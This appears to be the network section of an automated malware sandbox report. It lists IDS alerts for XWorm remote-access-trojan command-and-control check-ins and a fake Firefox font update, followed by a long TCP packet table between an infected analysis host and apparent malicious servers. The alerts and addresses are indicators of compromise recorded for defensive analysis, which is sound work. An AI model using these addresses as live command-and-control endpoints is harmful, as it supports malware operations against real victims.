2024-12-07T13:01:14.561754+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	50005	104.21.16.9	443	TCP
2024-12-07T13:01:15.616343+0100	2855924	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.7	49946	112.213.116.149	7000	TCP
2024-12-07T13:01:16.149117+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	112.213.116.149	7000	192.168.2.7	49946	TCP
2024-12-07T13:01:16.243981+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.7	49946	112.213.116.149	7000	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 7, 2024 12:59:03.055042982 CET	49671	443	192.168.2.7	204.79.197.203
Dec 7, 2024 12:59:04.601959944 CET	49674	443	192.168.2.7	104.98.116.138
Dec 7, 2024 12:59:04.601982117 CET	49675	443	192.168.2.7	104.98.116.138
Dec 7, 2024 12:59:04.789495945 CET	49672	443	192.168.2.7	104.98.116.138
Dec 7, 2024 12:59:05.461286068 CET	49671	443	192.168.2.7	204.79.197.203
Dec 7, 2024 12:59:09.480684996 CET	49677	443	192.168.2.7	20.50.201.200
Dec 7, 2024 12:59:09.851933002 CET	49677	443	192.168.2.7	20.50.201.200
Dec 7, 2024 12:59:10.273840904 CET	49671	443	192.168.2.7	204.79.197.203
Dec 7, 2024 12:59:10.290937901 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:10.410660982 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:10.410761118 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:10.439096928 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:10.560641050 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:10.601932049 CET	49677	443	192.168.2.7	20.50.201.200
Dec 7, 2024 12:59:11.754575968 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:11.754631042 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:11.784635067 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:11.904356003 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:12.101929903 CET	49677	443	192.168.2.7	20.50.201.200
Dec 7, 2024 12:59:12.246563911 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:12.246711016 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:12.247884989 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:12.367650986 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:12.692886114 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:12.693022966 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:12.693120956 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:12.693265915 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:12.694842100 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:12.814626932 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:13.143208027 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:13.143279076 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:13.143454075 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:13.143465996 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:13.143501997 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:13.143942118 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:13.143954992 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:13.144001961 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:13.144859076 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:13.144886017 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:13.144915104 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:13.144932032 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:13.151669979 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:13.151741028 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:13.153211117 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:13.272979975 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:13.597419024 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:13.597474098 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:13.620923996 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:13.621223927 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:13.741358042 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:13.741594076 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:13.741602898 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:13.741648912 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:13.741657972 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:13.741714001 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:13.741729021 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:14.001476049 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:14.001523018 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:14.001609087 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:14.002016068 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:14.002027988 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:14.211347103 CET	49674	443	192.168.2.7	104.98.116.138
Dec 7, 2024 12:59:14.211357117 CET	49675	443	192.168.2.7	104.98.116.138
Dec 7, 2024 12:59:14.398843050 CET	49672	443	192.168.2.7	104.98.116.138
Dec 7, 2024 12:59:14.585624933 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:14.588047981 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.086325884 CET	49677	443	192.168.2.7	20.50.201.200
Dec 7, 2024 12:59:15.123838902 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.243604898 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.566898108 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.566967964 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.567049980 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.567094088 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.570849895 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.570915937 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.571964025 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.572016954 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.572129011 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.572192907 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.580128908 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.580183983 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.580451012 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.580498934 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.588553905 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.588620901 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.588737965 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.588793039 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.596973896 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.597031116 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.597172976 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.597256899 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.605308056 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.605365038 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.696527958 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.696626902 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.696707964 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.696851015 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.700762987 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.700822115 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.700949907 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.700997114 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.709100962 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.709156036 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.709430933 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.709486008 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.717582941 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.717643023 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.717765093 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.717814922 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.725549936 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:15.725634098 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:15.725925922 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.725975990 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.729574919 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:15.729587078 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:15.729867935 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:15.738018990 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:15.759056091 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.759155035 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.759239912 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.759239912 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.763067007 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.763123035 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.763300896 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.763351917 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.771544933 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.771616936 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.774492979 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.774553061 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.774718046 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.774777889 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.783278942 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.783323050 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:15.783330917 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.783426046 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.783474922 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.791280031 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.791332960 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.791534901 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.791582108 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.799734116 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.799779892 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.799920082 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.799967051 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.808028936 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.808082104 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.826540947 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.826780081 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.826782942 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.826988935 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.830668926 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.830718994 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.830842972 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.830887079 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.838850975 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.838907003 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.839049101 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.839092970 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.847058058 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.847126961 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.847250938 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.847296000 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.854434013 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.854496956 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.888757944 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.888892889 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.888948917 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.890762091 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.890791893 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.890813112 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.890983105 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.891031027 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.898118973 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.898170948 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.898315907 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.898360968 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.905492067 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.905549049 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.905728102 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.905776978 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.912964106 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.913028955 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.913327932 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.913382053 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.920361996 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.920427084 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.920602083 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.920650005 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.927239895 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.927292109 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.927463055 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.927515030 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.933728933 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.933813095 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.933969021 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.934021950 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.939944983 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.940016985 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.940176964 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.940221071 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.946197987 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.946273088 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.953332901 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.953397036 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.953586102 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.953634977 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.955235958 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.955291033 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.955997944 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.956047058 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.956439018 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.956486940 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.959952116 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.960007906 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.960079908 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.960123062 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.963857889 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.963927031 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.964078903 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.964124918 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.967894077 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.967952013 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.968092918 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.968142986 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.971708059 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.971766949 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.971968889 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.972014904 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.975632906 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.975687981 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.975809097 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.975857019 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.979564905 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.979638100 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.979815006 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.979871988 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.983392954 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.983459949 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.983668089 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.983711004 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.987327099 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.987374067 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.987478971 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.987520933 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:15.991137028 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:15.991190910 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.018660069 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.018718958 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.018842936 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.018888950 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.018906116 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.020603895 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.020651102 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.020768881 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.020806074 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.024365902 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.024410009 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.024571896 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.024611950 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.028153896 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.028208017 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.028345108 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.028384924 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.031877041 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.031924963 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.032095909 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.032139063 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.035727978 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.035801888 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.035847902 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.035891056 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.081517935 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.081593990 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.081649065 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.081691027 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.084263086 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.084322929 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.084326982 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.084413052 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.084983110 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.085149050 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.085199118 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.087877035 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.088059902 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.088129044 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.090437889 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.090502977 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.090614080 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.091155052 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.092993975 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.093054056 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.093234062 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.093285084 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.095771074 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.095843077 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.096095085 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.096138000 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.098531008 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.098694086 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.098778009 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.101315022 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.101418972 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.101466894 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.103801012 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.104111910 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.104172945 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.106359005 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.106545925 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.106606007 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.108993053 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.109045982 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.109153986 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.111677885 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.111763000 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.145615101 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.145782948 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.145884037 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.146667957 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.146970034 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.147021055 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.148286104 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.148344040 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.148657084 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.150063992 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.150458097 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.150509119 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.150676012 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.150724888 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.152439117 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.152498960 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.152671099 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.152724981 CET	49701	80	192.168.2.7	185.215.113.206
